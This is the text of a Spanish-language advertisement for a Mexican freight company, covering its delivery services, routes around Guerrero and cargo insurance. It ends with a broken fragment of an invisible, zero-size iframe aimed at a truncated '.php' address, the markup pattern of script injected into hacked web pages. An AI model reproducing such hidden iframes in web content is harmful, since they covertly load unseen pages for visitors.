El mercado nacional e internacional se encuentra en un amplio desarrollo y empresas como la suya requiere de una buena logística de distribución. Es por eso que Transportes Rápidos de AMSA, S.A. de C.V. empresa con 25 años de experiencia dentro del ramo del transporte se pone a sus apreciables órdenes para ofrecerle nuestro servicio de transportación en sus diferentes modalidades, según como su empresa lo requiera; contamos con servicios de entregas especiales, ya sea en camión completo hasta 25 toneladas, paquetería o carga consolidada. Con entrega a domicilio (siempre y cuando haya acceso a unidades de entrega. Recuerde que en la Cd. de Acapulco, por disposiciones oficiales en el reglamento de tránsito estamos restringidos en horarios de reparto, por tal motivo nos podríamos diferir un poco en su entrega) o bien puede enviar su mercancía Ocurre Oficina (únicamente en las oficinas de México,D.F. y Acapulco, Gro.)

Ud. puede estar totalmente confiado que su mercancía llegará a su destino sin ninguna demora ya que Transportes Rápidos de AMSA S.A. de C.V. es líder en realizar el servicio Justo a Tiempo en las siguientes rutas:

México-Acapulco
Iguala
Chilpancingo
Ixtapa
Zihuatanejo

Nuestra misión es que usted pueda contar con un servicio confiable y seguro, ya que toda la mercancía que transportamos viaja asegurada a partir del momento en que se realiza el embarque, ya sea con su propia compañía de seguros o si Ud. lo desea, con la empresa o póliza de seguros con la cual nosotros contamos.

Nuestro objetivo es que usted y su empresa queden complacidos con nuestro cometido ya que Transportes Rápidos de AMSA S.A. de C.V. se ha distinguido en brindar rapidez y un excelente servicio de transporte y entrega.


ount.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>/d